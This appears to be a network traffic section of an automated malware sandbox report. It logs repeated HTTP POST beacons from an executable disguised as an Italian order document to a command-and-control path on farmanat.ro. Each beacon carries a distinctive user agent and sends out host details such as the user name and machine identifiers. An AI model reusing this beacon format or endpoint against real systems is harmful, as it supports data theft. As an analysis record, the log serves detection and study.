Nov 25, 2021 10:53:20.485553980 CET	7169	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
614	192.168.11.20	50459	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:20.908344984 CET	7170	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:20.942959070 CET	7170	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:20.999043941 CET	7171	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
615	192.168.11.20	50460	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:21.387957096 CET	7171	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:21.421602964 CET	7172	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:21.490827084 CET	7172	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
616	192.168.11.20	50461	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:21.894494057 CET	7173	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:21.928659916 CET	7173	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:21.984409094 CET	7173	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
617	192.168.11.20	50462	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:22.409034967 CET	7174	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:22.443284988 CET	7174	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:22.498653889 CET	7175	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
618	192.168.11.20	50463	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:22.929209948 CET	7175	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:22.962769985 CET	7176	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:23.012940884 CET	7176	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
619	192.168.11.20	50464	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:23.429111958 CET	7177	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:23.463131905 CET	7177	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:23.516483068 CET	7177	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.11.20	49898	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:40.780535936 CET	6395	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:40.813941002 CET	6395	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:40.863092899 CET	6396	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
620	192.168.11.20	50465	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:23.867976904 CET	7178	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:23.901633978 CET	7178	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:23.950930119 CET	7179	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
621	192.168.11.20	50466	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:24.376610041 CET	7179	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:24.410288095 CET	7180	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:24.459855080 CET	7180	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
622	192.168.11.20	50467	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:24.847520113 CET	7181	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:24.881690025 CET	7181	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:24.931727886 CET	7181	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
623	192.168.11.20	50468	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:25.354969025 CET	7182	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:25.389082909 CET	7182	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:25.439336061 CET	7183	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
624	192.168.11.20	50469	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:25.882853985 CET	7183	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:25.917002916 CET	7184	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:25.969530106 CET	7184	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
625	192.168.11.20	50470	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:26.385596037 CET	7185	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:26.419796944 CET	7185	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:26.469978094 CET	7185	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
626	192.168.11.20	50471	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:26.886543989 CET	7186	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:26.920208931 CET	7186	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:26.969342947 CET	7187	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
627	192.168.11.20	50472	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:27.350877047 CET	7187	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:27.384341002 CET	7188	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:27.433881998 CET	7188	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
628	192.168.11.20	50473	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:27.846662998 CET	7189	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:27.880913019 CET	7189	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:27.932095051 CET	7189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
629	192.168.11.20	50474	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:28.355335951 CET	7190	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:28.388993979 CET	7190	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:28.439199924 CET	7191	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.11.20	49899	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:41.373512030 CET	6396	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:41.406961918 CET	6396	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:41.457207918 CET	6397	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
630	192.168.11.20	50475	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:28.862322092 CET	7191	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:28.896070957 CET	7192	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:28.948648930 CET	7192	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
631	192.168.11.20	50476	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:29.372843027 CET	7193	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:29.407104015 CET	7193	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:29.457895041 CET	7193	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
632	192.168.11.20	50477	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
